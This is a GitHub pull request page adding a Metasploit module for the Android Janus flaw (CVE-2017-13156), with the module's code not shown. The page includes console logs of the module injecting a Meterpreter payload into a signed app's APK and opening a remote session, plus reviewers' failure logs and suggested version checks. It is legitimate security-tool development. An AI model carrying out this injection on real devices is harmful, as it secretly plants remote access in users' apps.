Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2017-13156 Janus LPE for Android #12227

Merged
merged 8 commits into from Nov 7, 2019

Conversation

@timwr
Copy link
Contributor

timwr commented Aug 24, 2019

This module exploits CVE-2017-13156 in Android to install a payload into another application. The payload APK will have the same signature and can be installed as an update, preserving the existing data.

The vulnerability was fixed in the 5th December 2017 security patch, and was additionally fixed by the APK Signature scheme v2, so only APKs signed with the v1 scheme are vulnerable.

Verification

List the steps needed to make sure this thing works

$ apksigner verify -verbose notvulnerable.apk
Verifies
Verified using v1 scheme (JAR signing): true
Verified using v2 scheme (APK Signature Scheme v2): true
Number of signers: 1
$ apksigner verify -verbose vulnerablecamerasample.apk
Verifies
Verified using v1 scheme (JAR signing): true
Verified using v2 scheme (APK Signature Scheme v2): false
  • Run the module, and manually install the application on the device
  • Verify you get a new session as the target application

In future this could be combined with the EvilParcel vulnerability to automatically install the application on the device.

@timwr

This comment has been minimized.

Copy link
Contributor Author

timwr commented Aug 24, 2019

msf5 exploit(android/local/janus) > run

[*] Downloading APK: /data/app/com.phonegap.camerasample-1/base.apk
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.phonegap.camerasample.syerq
[*] Loading /tmp/d20190824-7164-qydvgj/original/smali/com/phonegap/camerasample/CameraSampleActivity.smali and injecting payload..
[*] Rebuilding apk with meterpreter injection as /tmp/d20190824-7164-qydvgj/output.apk
[*] Uploading APK: /sdcard/app.apk
[*] APK uploaded
msf5 exploit(android/local/janus) >
[*] Sending stage (72609 bytes)
[*] Meterpreter session 2 opened

msf5 exploit(android/local/janus) > sessions 2
[*] Starting interaction with 2...

meterpreter > pwd
/data/user/0/com.phonegap.camerasample/files

Ping @V-E-O, did you write the poc? Can I add you as an author?

@bwatters-r7 bwatters-r7 self-assigned this Sep 3, 2019
@V-E-O

This comment has been minimized.

Copy link

V-E-O commented Sep 4, 2019

@timwr It's Okay, thanks.

@bwatters-r7 bwatters-r7 removed their assignment Sep 6, 2019
@timwr timwr force-pushed the timwr:janus branch from 5b41949 to 37011c5 Oct 17, 2019
@timwr timwr changed the title Initial commit of the CVE-2017-13156 Janus LPE for Android CVE-2017-13156 Janus LPE for Android Oct 17, 2019
@timwr timwr added android and removed needs-docs labels Oct 17, 2019
@space-r7 space-r7 self-assigned this Oct 29, 2019
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Nov 1, 2019

while only a little ugly, here's a case of a bad apk:

[*] Downloading APK: /system/app/VZNavigator.apk
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.vznavigator.schi535.krmaj
[*] Loading /tmp/d20191101-12370-vc0me4/original/smali/com/navbuilder/app/atlasbook/NavBuilderApplication.smali and injecting payload..
[*] Rebuilding apk with meterpreter injection as /tmp/d20191101-12370-vc0me4/output.apk
[-] I: Using Apktool 2.4.0-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuffer;
        at org.jf.dexlib2.writer.DexWriter.writeAnnotationDirectories(DexWriter.java:790)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:340)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:297)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:61)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:36)
        at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:419)
        at brut.androlib.Androlib.buildSources(Androlib.java:350)
        at brut.androlib.Androlib.build(Androlib.java:302)
        at brut.androlib.Androlib.build(Androlib.java:269)
        at brut.apktool.Main.cmdBuild(Main.java:247)
        at brut.apktool.Main.main(Main.java:79)
[-] Exploit failed: RuntimeError Unable to rebuild apk with apktool
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Nov 1, 2019

and another:

msf5 exploit(android/local/janus) > set package com.vzw.hs.android.modlite
package => com.vzw.hs.android.modlite
msf5 exploit(android/local/janus) > run

[*] Downloading APK: /system/app/VzTones.apk
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[-] Exploit failed: RuntimeError Unable to find hook point in /tmp/d20191101-12370-1mqakdn/original/smali*/VTonesLauncher.smali
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Nov 1, 2019

According to https://stackoverflow.com/a/42977813 you can do a check on the security version if its lollipop or newer.
So a check method could hit that, and also check that if its pre-lollipop you won't know but thats

4.4.2 gave me

getprop ro.build.version.security_patch

According to https://www.cvedetails.com/cve/CVE-2017-13156/ minimum version is 5.1.1. So could add an OS Version check in there as well.

Ill add a PR back on this.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Nov 3, 2019

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Nov 6, 2019

timwr#11

May need to update the info comment since its now a random name :)

h00die and others added 2 commits Nov 6, 2019
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Nov 6, 2019

travis looks unrelated, all passed but one which timed out. Getting ready to land this now.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Nov 6, 2019

Landed rapid7/metasploit-payloads#356 and @jmartin-r7 found an issue with the payload bump, waiting on him to land this.

@h00die h00die merged commit 5711eff into rapid7:master Nov 7, 2019
2 of 3 checks passed
2 of 3 checks passed
continuous-integration/travis-ci/pr The Travis CI build could not complete due to an error
Details
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
@h00die h00die self-assigned this Nov 7, 2019
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Nov 7, 2019

Release Notes

This adds an LPE for Android CVE-2017-13156 named Janus

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
5 participants
You can’t perform that action at this time.